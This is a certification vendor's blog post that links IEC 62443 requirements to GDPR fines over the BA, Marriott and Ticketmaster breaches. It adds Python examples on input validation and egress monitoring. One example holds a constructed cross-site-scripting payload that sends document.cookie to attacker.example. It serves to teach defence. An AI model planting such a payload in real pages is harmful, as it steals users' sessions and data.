This is the next in a series of blogs and papers on the benefits of cyber certification. You can read part 1 here and part 2 here. Certification provides you with the opportunity to work with an experienced cyber team here at exida, and the vast knowledge of cyber experts worldwide codified in the IEC 62443 family of standards.
The European Union's General Data Protection Regulation (GDPR) fines organizations that fail to properly protect personal data. No comparable federal regulation exists in the United States, although some groups are trying to make that happen. It is easy to see why large corporations do not want one (more systems to spend money on), so it continues to be an uphill battle.
According to the report referenced below, GDPR fines assessed during the last quarter of 2020 on organizations whose data breaches compromised personal data totaled almost €110 million (about $130 million). Several prominent examples follow.
How often have you purchased a plane ticket online? If you bought one from British Airways (BA) in late summer 2018, there is a good chance that your name, address and payment card details were skimmed from the BA site during the purchase. BA did not detect that a script had been injected into its website which captured the data entered on the payment page and sent it to an attacker-controlled server. This went on for about two weeks before discovery. The UK Information Commissioner's Office (ICO), enforcing the GDPR, found this negligent and fined BA £20M. Injecting attacker-controlled script into a web page, cross-site scripting, is a well-known attack class and is specifically covered in IEC 62443-4-2 CR 3.5 – Input validation (“…examples where invalid inputs lead to system security issues include SQL injection attacks, cross-site scripting or malformed packets…”). Had BA put its website through a certification, this weakness would have been discussed and mitigations put in place. The ICO concluded that this was a well-understood attack and that BA could have done a better job of securing its users' data.
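What the input-validation requirement cited above looks like in code, as an added example that is not part of the original post or of any exida material: a confirmation page rendered once with untrusted input concatenated straight into HTML, and once with an allow-list check on the way in and HTML encoding on the way out. The page template, the field rules, the sample attacker payload and the e-mail addresses are all constructed for the example.

```python
# Added example (not from the exida post): input validation and output encoding
# for the cross-site-scripting case that IEC 62443-4-2 CR 3.5 cites.
# The page template, field rules and sample inputs are constructed for this example.
import html
import re

# Constructed confirmation-page template; {name} and {email} come from the user.
PAGE = "<p>Thank you, {name}. A receipt was sent to {email}.</p>"

# Constructed attacker payload: a script that would ship the session cookie
# to an attacker-controlled host if a browser ever rendered it.
ATTACK = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"


def render_vulnerable(name: str, email: str) -> str:
    """Untrusted input is concatenated straight into HTML: classic XSS."""
    return PAGE.format(name=name, email=email)


class InvalidInput(ValueError):
    """Raised when a field fails the allow-list check."""


# Allow-lists: only the characters a name or e-mail address legitimately needs.
NAME_RE = re.compile(r"^[\w .'\-]{1,64}$")
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}$")


def validate_name(name: str) -> str:
    if not NAME_RE.fullmatch(name):
        raise InvalidInput(f"name rejected: {name!r}")
    return name


def validate_email(email: str) -> str:
    if len(email) > 254 or not EMAIL_RE.fullmatch(email):
        raise InvalidInput(f"email rejected: {email!r}")
    return email


def render_hardened(name: str, email: str) -> str:
    """Validate on the way in, encode on the way out.

    Validation rejects anything outside the allow-list; encoding makes sure
    that characters which do pass (the apostrophe in O'Brien) cannot change
    the meaning of the surrounding HTML.
    """
    name = validate_name(name)
    email = validate_email(email)
    return PAGE.format(name=html.escape(name, quote=True),
                       email=html.escape(email, quote=True))


def contains_script(rendered: str) -> bool:
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in rendered.lower()


def demo() -> dict:
    """Run both renderers against a malicious and a benign name."""
    results = {
        "vulnerable_executes_attack": contains_script(
            render_vulnerable(ATTACK, "alice@example.com")),
        "hardened_rejects_attack": False,
        "hardened_encodes_apostrophe": "O&#x27;Brien" in render_hardened(
            "O'Brien", "alice@example.com"),
    }
    try:
        render_hardened(ATTACK, "alice@example.com")
    except InvalidInput:
        results["hardened_rejects_attack"] = True
    return results


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

The two layers are deliberately separate: the allow-list is the input-validation control the standard names, and the encoding is what protects the page when a value is legitimately allowed to contain a character (an apostrophe, an ampersand) that also has meaning in HTML. Rejecting only the string `<script` would be a deny-list and is exactly the kind of validation that skimmers route around.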
The breach Marriott discovered in 2018, which had been under way for nearly four years, cost the company £18.4M. The ICO's original notice of intent was for £99.2M, reduced in late 2020 in part because of the economic impact of COVID-19. Nearly 340 million guest records worldwide were compromised, including passport numbers. A Remote Access Trojan (RAT) had been present on the servers for some time, operating under an account with administrative privileges whose legitimate user had not run the database queries in question. Investigators surmised that the RAT had been installed as the result of an email phishing campaign. This kind of social engineering has been highly productive for attackers, and the first line of defense is user education. User competence is a key part of IEC 62443-4-1 Practice 8 – Security guidelines, which covers secure installation and security maintenance; effective security maintenance depends on trained users. This is often called “security hygiene,” and every organization needs to reinforce it with staff on a regular basis. The next line of defense would have been monitoring network traffic. IEC 62443-4-2 CR 6.2 – Continuous monitoring calls for the capability to detect security breaches, which is what an Intrusion Detection System (IDS) provides: it can report on traffic that does not match the expected profile. Organizations need to know their network traffic profiles. Letting this attack go on for four years was unconscionable.
Ticketmaster was fined £1.25M after an estimated 9.4 million customers had their payment details compromised. Ticketmaster had incorporated a chat widget from a third party, Inbenta Technologies, into its payment page, and that third-party script was altered to harvest the card data entered on the page. Ticketmaster had not done its due diligence on Inbenta's security practices and paid the price. IEC 62443-4-1 has specific requirements on establishing relationships with vendors and assessing their security capabilities before a third-party component is incorporated into the product. In addition, an Intrusion Detection System could have surfaced the unexpected traffic. None of this is easy, but it is well worth the effort when weighed against the fine and the damage to the company's reputation.
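The “know your traffic profile” monitoring that the Marriott and Ticketmaster paragraphs both call for, as an added example that is not part of the original post or of any exida product: a baseline of expected egress destinations, a small parser for firewall-style egress log lines, and a report of every connection that falls outside the baseline. The log format, the hostnames, the source names and the allow-list are all constructed for the example; a real deployment would build the baseline from weeks of reviewed flow data.

```python
# Added example (not from the exida post): a "know your traffic profile" check of
# the kind an IDS performs, run over a constructed egress log. The log format,
# hostnames, sources and the allow-list below are all made up for the example.
from collections import defaultdict

# Constructed baseline: (destination, port) pairs the payment tier is expected to reach.
KNOWN_EGRESS = {
    ("api.payments.example", 443),
    ("cdn.vendor.example", 443),
    ("ntp.example", 123),
}

# Constructed egress log lines: "<timestamp> <source> -> <destination>:<port> <bytes>".
# One line is deliberately corrupt to show that the parser skips rather than crashes.
SAMPLE_LOG = """\
2020-09-01T10:00:01Z web-01 -> api.payments.example:443 812
2020-09-01T10:00:04Z web-01 -> cdn.vendor.example:443 3310
2020-09-01T10:00:05Z web-02 -> collector.attacker.example:443 214
2020-09-01T10:00:06Z db-01 -> ntp.example:123 48
this line is corrupt and must not crash the parser
2020-09-01T10:00:09Z web-02 -> collector.attacker.example:443 220
2020-09-01T10:00:12Z db-01 -> api.payments.example:8443 96
2020-09-01T10:00:15Z web-02 -> collector.attacker.example:443 218
2020-09-01T10:00:17Z web-01 -> api.payments.example:443 790
"""


def parse_line(line: str):
    """Return (timestamp, source, destination, port, bytes) or None if malformed."""
    parts = line.split()
    if len(parts) != 5 or parts[2] != "->":
        return None
    host, _, port = parts[3].rpartition(":")
    try:
        return parts[0], parts[1], host, int(port), int(parts[4])
    except ValueError:
        return None


def find_unknown_egress(log_text: str, known: set) -> dict:
    """Aggregate every connection whose (destination, port) is not in the baseline.

    The baseline key is the pair, not just the host: a known host on an
    unexpected port (here api.payments.example:8443) is reported too.
    """
    unknown = defaultdict(lambda: {"count": 0, "bytes": 0, "sources": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line: skipped, would be counted in a real tool
        _, src, dst, port, nbytes = rec
        if (dst, port) in known:
            continue
        entry = unknown[(dst, port)]
        entry["count"] += 1
        entry["bytes"] += nbytes
        entry["sources"].add(src)
    return dict(unknown)


def report(log_text: str, known: set) -> list:
    """Human-readable findings, most frequent unknown destination first."""
    findings = find_unknown_egress(log_text, known)
    ordered = sorted(findings.items(), key=lambda kv: -kv[1]["count"])
    return [
        f"{dst}:{port} {e['count']} conn {e['bytes']} bytes from "
        f"{','.join(sorted(e['sources']))}"
        for (dst, port), e in ordered
    ]


if __name__ == "__main__":
    for finding in report(SAMPLE_LOG, KNOWN_EGRESS):
        print("UNKNOWN EGRESS", finding)
```

Two caveats a practitioner should keep in mind. First, the check is only as good as the baseline: an attacker who exfiltrates over a destination that is already on the allow-list (a cloud storage bucket the organization also uses, say) is invisible to it, so the baseline should be reviewed, not just accumulated. Second, in the BA and Ticketmaster cases the skimmed card data left from the customer's browser to the attacker's server, so a network IDS inside the merchant's own network would not have seen that traffic at all; browser-side controls on what a page may load and where it may send data are the necessary complement, while server-side egress monitoring of the kind shown here is what would have caught the long-running remote access in the Marriott case.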
One can review the report (see reference below) and conclude that each of these fines could have been avoided by working with and understanding the IEC 62443 standards. If you believe your product or organization could be vulnerable, look to the combined knowledge of security experts around the world codified in the standards. At exida, we have been certifying products and systems for 20 years and can help you understand and apply the standards to your organization.